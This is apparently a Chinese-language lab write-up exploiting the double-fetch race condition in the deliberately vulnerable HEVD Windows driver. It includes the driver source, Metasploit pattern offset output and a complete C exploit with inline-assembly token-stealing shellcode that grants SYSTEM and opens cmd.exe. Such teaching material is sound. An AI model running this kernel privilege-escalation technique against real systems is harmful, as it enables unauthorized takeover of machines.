作者selph

前言

窺探Ring0漏洞世界：條件競(jìng)爭(zhēng)漏洞

在多線程訪問(wèn)臨界區(qū)的情況下，使用進(jìn)程互斥可以使多個(gè)線程不能同時(shí)訪問(wèn)操作關(guān)鍵區(qū)的變量，條件競(jìng)爭(zhēng)漏洞就源于沒有對(duì)可能會(huì)被多個(gè)線程訪問(wèn)的變量進(jìn)行保護(hù)，導(dǎo)致多重訪問(wèn)使得在一次操作中，操作的值在中間發(fā)生了變化。

實(shí)驗(yàn)環(huán)境：

?虛擬機(jī)：Windows 7 x86

?物理機(jī)：Windows 10 x64

?軟件：IDA，Windbg，VS2022

漏洞分析

老樣子，先IDA分析漏洞函數(shù)TriggerDoubleFetch，然后再看看源碼

首先初始化800h字節(jié)棧緩沖區(qū)：

然后取出用戶Buffer地址保存到局部變量里：

接下來(lái)用用戶傳入?yún)?shù)的Size進(jìn)行比較大小判斷長(zhǎng)度合法性：

合法性通過(guò)之后，將用戶緩沖區(qū)復(fù)制到內(nèi)核里

源碼：

/// <summary>
/// Trigger the Double Fetch Vulnerability
/// </summary>
/// <param name="UserDoubleFetch">The pointer to user mode buffer</param>
/// <returns>NTSTATUS</returns>
__declspec(safebuffers)
NTSTATUS
TriggerDoubleFetch(
_In_ PDOUBLE_FETCH UserDoubleFetch
)
{
??? PVOID UserBuffer = NULL;
???NTSTATUS Status = STATUS_SUCCESS;
??? ULONG KernelBuffer[BUFFER_SIZE] = { 0 };

#ifdef SECURE
???SIZE_T UserBufferSize = 0;
#endif

???PAGED_CODE();

??? __try
??? {
???????//
???????// Verify if the buffer resides in user mode
???????//

???????ProbeForRead(UserDoubleFetch, sizeof(DOUBLE_FETCH), (ULONG)__alignof(UCHAR));

???????DbgPrint("[+] UserDoubleFetch: 0x%p\n", UserDoubleFetch);
???????DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
???????DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));

#ifdef SECURE
???????UserBuffer = UserDoubleFetch->Buffer;
???????UserBufferSize = UserDoubleFetch->Size;

???????//
???????// Verify if the 'UserDoubleFetch->Buffer' resides in user mode
???????//

???????ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));

???????DbgPrint("[+] UserDoubleFetch->Buffer: 0x%p\n", UserBuffer);
???????DbgPrint("[+] UserDoubleFetch->Size: 0x%zX\n", UserBufferSize);

???????if (UserBufferSize > sizeof(KernelBuffer))
??????? {
???????????DbgPrint("[-] Invalid Buffer Size: 0x%zX\n", UserBufferSize);

???????????Status = STATUS_INVALID_PARAMETER;
???????????return Status;
??????? }

???????//
???????// Secure Note: This is secure because the developer is fetching
? ??????// 'UserDoubleFetch->Buffer' and 'UserDoubleFetch->Size' from user
???????// mode just once and storing it in a temporary variable. Later, this
???????// stored values are passed to RtlCopyMemory()/memcpy(). Hence, there
???????// will be no race condition
???????//

???????RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, UserBufferSize);
#else
???????UserBuffer = UserDoubleFetch->Buffer;
???????DbgPrint("[+] UserDoubleFetch->Buffer: 0x%p\n", UserBuffer);
???????DbgPrint("[+] UserDoubleFetch->Size: 0x%zX\n", UserDoubleFetch->Size);

???????//
???????// Verify if the 'UserDoubleFetch->Buffer' resides in user mode
???????//

???????ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));

???????if (UserDoubleFetch->Size > sizeof(KernelBuffer))
??????? {
???????????DbgPrint("[-] Invalid Buffer Size: 0x%zX\n", UserDoubleFetch->Size);

???????????Status = STATUS_INVALID_PARAMETER;
???????????return Status;
??????? }

???????DbgPrint("[+] Triggering Double Fetch\n");

??????? //
???????// Vulnerability Note: This is a vanilla Double Fetch vulnerability because the
???????// developer is fetching 'UserDoubleFetch->Size' from user mode twice and the
???????// double fetched values are passed to RtlCopyMemory()/memcpy().
????? ??// This creates a race condition and the size check could be bypassed which will later
???????// cause stack based buffer overflow
???????//

???????RtlCopyMemory((PVOID)KernelBuffer, UserBuffer, UserDoubleFetch->Size);
#endif
??? }
???__except (EXCEPTION_EXECUTE_HANDLER)
??? {
???????Status = GetExceptionCode();
???????DbgPrint("[-] Exception Code: 0x%X\n", Status);
??? }

???return Status;
}

安全版本和漏洞版本的區(qū)別在于，是否用局部變量接收了用戶傳來(lái)的參數(shù)，這里接收的是一個(gè)結(jié)構(gòu)體指針，指向用戶內(nèi)存的值，安全版本一次性用局部變量保存了用戶傳來(lái)的值，然后進(jìn)行校驗(yàn)和復(fù)制，不安全版本則是直接從用戶內(nèi)存去讀取這個(gè)值來(lái)進(jìn)行操作

如果用戶內(nèi)存的這個(gè)結(jié)構(gòu)的值是變化的，當(dāng)校驗(yàn)的時(shí)候，Size合法，當(dāng)復(fù)制的時(shí)候Size不合法，則可能造成緩沖區(qū)棧溢出

漏洞利用

通過(guò)多線程來(lái)實(shí)現(xiàn)對(duì)用戶緩沖區(qū)的操作，一個(gè)線程用來(lái)發(fā)起正常請(qǐng)求，一個(gè)線程用來(lái)修改Size大?。?/p>

DWORD WINAPI FlippingThread() {
while (TRUE) {
???????UserBuffer->Size = 0x900;
??? }
}

DWORD WINAPI RacingThread() {
??? while (TRUE) {
???????ULONG WriteRet = 0;
???????UserBuffer->Size = 0x100;
???????DeviceIoControl(hDevice, 0x222037, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);
??? }
}

測(cè)試代碼：

#include <iostream>
#include <Windows.h>

typedef struct _UserObject {
ULONG_PTR Buffer;
??? ULONG Size;
}UserObject, * PUserObject;

HANDLE hDevice = NULL;
ULONG UserBufferSize = sizeof(UserObject);
PUserObject UserBuffer = { 0 };

int main()
{
???hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
??? if (hDevice == INVALID_HANDLE_VALUE) {
???????printf("[ERROR]Open Device Error\r\n");
???????system("pause");
???????exit(1);
??? }
??? else {
???????printf("[INFO]Device Handle: 0x%X\n", hDevice);
??? }

???UserBuffer = (PUserObject)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
??? if (!UserBuffer) {
???????printf("[ERROR]Allocate ERROR");
???????system("pause");
???????exit(1);
??? }
??? else {
???????printf("[INFO]Allocated Memory: 0x%p\n", UserBuffer);
???????printf("[INFO]Allocation Size: 0x%X\n", UserBufferSize);
??? }

??? //?申請(qǐng)用戶緩沖區(qū)，填充滿A
???UserBuffer->Buffer = (ULONG_PTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x900);
???RtlFillMemory((void*)UserBuffer->Buffer, 0x900, 'A');

??? //?啟動(dòng)多線程
???HANDLE hThreadRacing[10] = { 0 };
???HANDLE hThreadFlipping[10] = { 0 };
??? for (size_t i = 0; i < 10; i++)
??? {
???????hThreadRacing[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)RacingThread, NULL, 0, 0);
???????hThreadFlipping[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FlippingThread, NULL, 0, 0);
??? }

??? //?多線程超時(shí)則關(guān)閉線程
??? if (WaitForMultipleObjects(10, hThreadRacing, TRUE, 120000)) {
???????for (size_t i = 0; i < 10; i++)
??????? {
???????????TerminateThread(hThreadRacing[i], 0);
???????????CloseHandle(hThreadRacing[i]);
???????????TerminateThread(hThreadFlipping[i], 0);
???????????CloseHandle(hThreadFlipping[i]);
??????? }
??? }

???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer->Buffer);
???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
???UserBuffer = NULL;

???system("pause");
???system("cmd.exe");

???return 0;
}

不出意外，很快windbg里就有反應(yīng)了，異常0xC0000005，查看寄存器：

kd> r
eax=00000000 ebx=88739938 ecx=158c4b84 edx=00000000 esi=83ec8087 edi=887398c8
eip=41414141 esp=83aceae0 ebp=41414141 iopl=0nv up ei ng nz ac po nc
cs=0008?ss=0010? ds=0023? es=0023?fs=0030? gs=0000???????????? efl=00010292
41414141 ??????????????? ???

發(fā)生了棧溢出，接下來(lái)用老方法去找溢出點(diǎn)，Kali的pattern_create.rb腳本：

┌──(selph?kali)-[~/桌面]
└─$ ./pattern_create.rb -l 0x900????????
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7

用隨機(jī)字符串替換緩沖區(qū)的值，再次執(zhí)行，很快又崩潰了：

Access violation - code c0000005 (!!! second chance !!!)
35724334 ?????

獲取溢出點(diǎn)位置：

┌──(selph?kali)-[~/桌面]
└─$ ./pattern_offset.rb -q 35724334 -l 0x900
[*] Exact match at offset 2084

編寫exp：

最終版本exp代碼，通過(guò)提升線程優(yōu)先級(jí)來(lái)提高條件競(jìng)爭(zhēng)發(fā)生的幾率，代碼如下：

#include <iostream>
#include <Windows.h>
#include <Psapi.h>

// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET0x124?// nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET??? 0x050?// nt!_KTHREAD.ApcState.Process
#define PID_OFFSET???????? 0x0B4?// nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET?????? 0x0B8?// nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET??? ???0x0F8?// nt!_EPROCESS.Token
#define SYSTEM_PID???????? 0x004?// SYSTEM Process PID

typedef struct _UserObject {
???ULONG_PTR Buffer;
??? ULONG Size;
}UserObject, * PUserObject;

HANDLE hDevice = NULL;
ULONG UserBufferSize = sizeof(UserObject);
PUserObject UserBuffer = { 0 };
const char* randomSeries = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7";

VOID TokenStealingPayloadWin7() {
??? // Importance of Kernel Recovery
??? __asm {
???????pushad

??????? ;獲取當(dāng)前進(jìn)程EPROCESS
???????xor eax, eax
???????mov eax, fs: [eax + KTHREAD_OFFSET]
??????? mov eax, [eax + EPROCESS_OFFSET]
???????mov ecx, eax

??????? ;搜索system進(jìn)程EPROCESS
???????mov edx, SYSTEM_PID
???????SearchSystemPID :
???????mov eax, [eax + FLINK_OFFSET]
???????sub eax, FLINK_OFFSET
???????cmp[eax + PID_OFFSET], edx
???????jne SearchSystemPID

??????? ; token竊取
???????mov edx, [eax + TOKEN_OFFSET]
???????mov[ecx + TOKEN_OFFSET], edx

??????? ;環(huán)境還原?+?返回
???????popad
???????xor eax, eax
???????add esp, 12
???????pop ebp
???????ret 8
??? }
}

DWORD WINAPI FlippingThread() {
??? while (TRUE) {
???????UserBuffer->Size = 0x824+4;
??? }
}

DWORD WINAPI RacingThread() {
??? while (TRUE) {
???????ULONG WriteRet = 0;
???????UserBuffer->Size = 0x200;
???????DeviceIoControl(hDevice, 0x222037, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);
??? }
}

int main()
{
??? PVOID EopPayload = &TokenStealingPayloadWin7;
???hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
? ??UserBuffer = (PUserObject)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
???UserBuffer->Buffer = (ULONG_PTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x900);
???RtlCopyMemory((void*)UserBuffer->Buffer, randomSeries, 0x900);
??? *(PULONG)(UserBuffer->Buffer + 0x824) = (ULONG)EopPayload;

???HANDLE hThreadRacing[10] = { 0 };
???HANDLE hThreadFlipping[10] = { 0 };
??? for (size_t i = 0; i < 10; i++)
??? {
???????hThreadRacing[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)RacingThread, NULL, CREATE_SUSPENDED, 0);
???????hThreadFlipping[i] = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)FlippingThread, NULL, CREATE_SUSPENDED, 0);
???
???????//?設(shè)置優(yōu)先級(jí)可以提升線程搶占到CPU的頻率，更有機(jī)會(huì)執(zhí)行到shellcode
???????SetThreadPriority(hThreadRacing[i], THREAD_PRIORITY_HIGHEST);
???????SetThreadPriority(hThreadFlipping[i], THREAD_PRIORITY_HIGHEST);

???????ResumeThread(hThreadRacing[i]);
???????ResumeThread(hThreadFlipping[i]);
??? }

??? if (WaitForMultipleObjects(10, hThreadRacing, TRUE, 60000)) {
????? ??for (size_t i = 0; i < 10; i++)
??????? {
???????????TerminateThread(hThreadRacing[i], 0);
???????????CloseHandle(hThreadRacing[i]);
???????????TerminateThread(hThreadFlipping[i], 0);
???????????CloseHandle(hThreadFlipping[i]);
??????? }
??? }

??? HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer->Buffer);
???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
???UserBuffer = NULL;

???system("pause");
???system("cmd.exe");

???return 0;
}

截圖演示

參考資料

?[1] hacksysteam/HackSysExtremeVulnerableDriver: HackSys Extreme Vulnerable Windows Driver (github.com)

https://github.com/hacksysteam/HackSysExtremeVulnerableDriver

?[2] HEVD writeups - yuvaly0's blog

https://yuvaly0.github.io/2020/09/15/hevd-writeups

?[3] CreateThread function (processthreadsapi.h) - Win32 apps | Microsoft Docs

https://docs.microsoft.com/zh-cn/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread?f1url=%3FappId%3DDev16IDEF1%26l%3DZH-CN%26k%3Dk(PROCESSTHREADSAPI%252FCreateThread)%3Bk(CreateThread)%3Bk(DevLang-C%252B%252B)%3Bk(TargetOS-Windows)%26rd%3Dtrue

?[4] WaitForMultipleObjects function (synchapi.h) - Win32 apps | Microsoft Docs

https://docs.microsoft.com/zh-cn/windows/win32/api/synchapi/nf-synchapi-waitformultipleobjects?f1url=%3FappId%3DDev16IDEF1%26l%3DZH-CN%26k%3Dk(SYNCHAPI%252FWaitForMultipleObjects)%3Bk(WaitForMultipleObjects)%3Bk(DevLang-C%252B%252B)%3Bk(TargetOS-Windows)%26rd%3Dtrue